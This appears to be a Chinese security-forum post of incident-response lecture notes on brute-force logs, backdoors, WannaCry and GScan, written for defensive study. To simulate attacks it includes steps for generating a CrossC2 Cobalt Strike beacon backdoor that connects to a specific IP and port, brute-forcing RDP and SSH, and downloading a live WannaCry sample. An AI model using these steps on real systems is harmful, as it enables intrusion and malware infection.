跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

74:应急响应-win&linux分析后门&勒索病毒&攻击 - zhengna

剑道尘心
剑道尘心
木马病毒分析

精选回复

发布于

操作系统(windows,linux)应急响应:

  • 1.常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC 木马等),病毒感染(挖矿,蠕虫,勒索等)
  • 2.常见分析:计算机账户,端口,进程,网络,启动,服务,任务,文件等安全问题

常见日志类别及存储:

  • Windows,Linux

补充资料:

  • https://xz.aliyun.com/t/485 应急响应大合集
  • https://www.secpulse.com/archives/114019.html 最全Windows安全工具锦集
  • https://docs.microsoft.com/en-us/sysinternals/ windows官方工具

病毒分析:

  • PCHunter:http://www.xuetr.com
  • 火绒剑:https://www.huorong.cn
  • Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
  • processhacker:https://processhacker.sourceforge.io/downloads.php
  • autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
  • OTL:https://www.bleepingcomputer.com/download/otl/
  • SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector

病毒查杀:

  • 卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
  • 大蜘蛛:http://free.drweb.ru/download+cureit+free
  • 火绒安全软件:https://www.huorong.cn
  • 360 杀毒:http://sd.360.cn/download_center.html

病毒动态:

  • CVERC-国家计算机病毒应急处理中心:http://www.cverc.org.cn
  • 微步在线威胁情报社区:https://x.threatbook.cn
  • 火绒安全论坛:http://bbs.huorong.cn/forum-59-1.html
  • 爱毒霸社区:http://bbs.duba.net
  • 腾讯电脑管家:http://bbs.guanjia.qq.com/forum-2-1.html

在线病毒扫描网站:

  • http://www.virscan.org //多引擎在线病毒扫描网
  • https://habo.qq.com //腾讯哈勃分析系统
  • https://virusscan.jotti.org //Jotti 恶意软件扫描系统
  • http://www.scanvir.com //计算机病毒、手机病毒、可疑文件分析

本课重点:

  • 案例1:攻击响应-暴力破解(RDP,SSH)-Win,Linux
  • 案例2:控制响应-后门木马(Webshell,PC)-Win,Linux
  • 案例3:危害响应-病毒感染(勒索 WannaCry)-Windows
  • 案例4:自动化响应检测-Gscan 多重功能脚本测试-Linux

案例1:攻击响应-暴力破解(RDP,SSH)-Win,Linux

Windows-LogFusion 载入查看:
事件归类,事件 ID,事件状态等,参考百度资料

Linux-grep 筛选:
1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o "Failed password" /var/log/secure|uniq -c

2、输出登录爆破的第一行和最后一行,确认爆破时间范围:
grep "Failed password" /var/log/secure|head -1
grep "Failed password" /var/log/secure|tail -1

3、进一步定位有哪些 IP 在爆破?
grep "Failed password" /var/log/secure|grep -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"|uniq -c | sort -nr

4、爆破用户名字典都有哪些?
grep "Failed password" /var/log/secure|perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}'|uniq -c|sort -nr

5、登录成功的日期、用户名、IP:
grep "Accepted " /var/log/secure | awk '{print $1,$2,$3,$9,$11}'
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr | more

案例演示1-windows日志查看

windows日志位置

zckajswpmfu3465.png

windows自带日志工具不好用,查找分析不方便,推荐使用插件LogFusion

ji1zpt25j043466.png

<1>LogFusion载入应用程序、硬件事件、安全、系统等日志

p10ssdsvic13467.png

<2>使用弱口令工具进行暴力破解(选择RDP协议),模拟攻击

oas342u0ppx3468.png

<3>在安全日志里看到很多账户登录失败的日志,可以判断当前主机遭受了爆破攻击,以及是否成功等

gnvvu4h1z3m3469.png

<4>双击进入,查看详细信息(可以看到是哪个IP地址爆破密码成功,成功登录了本机)

qndb3w40l2d3470.png

案例演示2-linux日志查看

linux日志位置

dc15gduu3cj3471.png

<1>首先使用弱口令工具进行暴力破解(选择SSH协议),模拟攻击

qujznpcnc4a3472.png

<2>linux日志分析,使用grep筛选

0w2eduy2tn33473.png

案例2:控制响应-后门木马(Webshell,PC)-Win,Linux

windows:默认配置测试
linux 借助 CrossC2 项目:netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
参考过程:http://www.adminxe.com/1287.html

CS借助CrossC2项目上线linux主机过程:
1.项目上传至服务端目录,给予执行权限

2.配置监听器:
windows/beacon_https/reverse_https 阿里云记得端口放行

3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及 windows 日志分析或执行记录查找后门问题

案例演示1-windows分析

<1>windows执行木马,CS上线,模拟攻击

esm0twd4e1e3474.png

<2>TCPView工具,可以查看哪个进程与远程IP通信过,从而确定系统是否曾经遭受过攻击。但是这个软件不太好用,上一步执行过的artifact.exe木马都没筛选出来。

hu4zkve0t3z3475.png

<3>Process Explorer工具,可以查看分析进程

2cbfmwqfomq3476.png

<4>PCHunter工具。缺点是,windows高版本网络信息,获取不全。比如木马在windows7执行后,该工具可以获取网络信息,如下图。但是同一木马在windows2018执行后,该工具获取不到网络信息。

ykkwfecxil53477.png

<5>UserAssistView工具,可以看到所有在windows系统上执行过的文件

zqz0zz5isbb3478.png

<6>logonsession工具,可以看到当前主机有哪些会话连接过,从而分析有没有过远程攻击

vfwkbiyreua3479.png

<7>autoruns工具,可以查看windows系统的自启动项目,从而发现是否有木马病毒等

hpsbhqjasxf3480.png

案例演示2-linux分析

CS是windows渗透工具,但是后期经过一些插件的开发,CS也可以上线linux系统,比如CS借助CrossC2项目上线linux主机

<1>项目上传至服务端目录,给予执行权限

v3k4sylojl03481.png

d3p4525vdn23482.png

<2>配置监听器:windows/beacon_https/reverse_https 阿里云记得端口放行

cgrdpya4byc3483.png

<3>生成后门:./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2

lnqsj3sim113484.png

<4>将后门上传到linux主机并执行

m0sv0pkkzye3485.png

<5>CS成功上线

0yfuovlal5s3486.png

<6>接下来就是分析日志,查找后门等,具体可见案例4。

案例3:危害响应-病毒感染(勒索 WannaCry)-Windows

详细说明中毒表现及恢复指南
推荐2个勒索病毒解密网站
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
[下载]永恒之蓝样本(勒索病毒): https://bbs.pediy.com/thread-217586-1.htm

案例演示

<1>下载勒索病毒样本,在虚拟机上执行(不要在本机执行,谨慎执行)

fgle11zeovh3487.png

<2>中毒后显示如下

gjzfvhywgd43488.png

<3>打开任何文件都乱码,弹框

3s11q1iw1w43489.png

<4>可以使用360勒索病毒解密网站进行病毒查询、在线解密等。

oimc5uku52z3490.png

<5>也可以使用nomoreransom网站尝试解密。

qiwye3udm5h3491.png

案例4:自动化响应检测-Gscan 多重功能脚本测试-Linux

参考:https://github.com/grayddq/GScan/
自动化响应检测工具:GScan、chkrootkit、rkhunter、lynis
都下载一下,应急响应时全都跑一遍

案例演示

<1>执行Gscan脚本

hn30yq4zrgq3492.png 

<2>可以看到,黑客进行了哪些攻击行为,是否成功等。

u45wbkib2oq3493.png

<3>netstat -ntl可以查看tcp端口等,再通过ps命令找到对应的进程,分析其是否是木马病毒

vfdumxmjlv13494.png

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。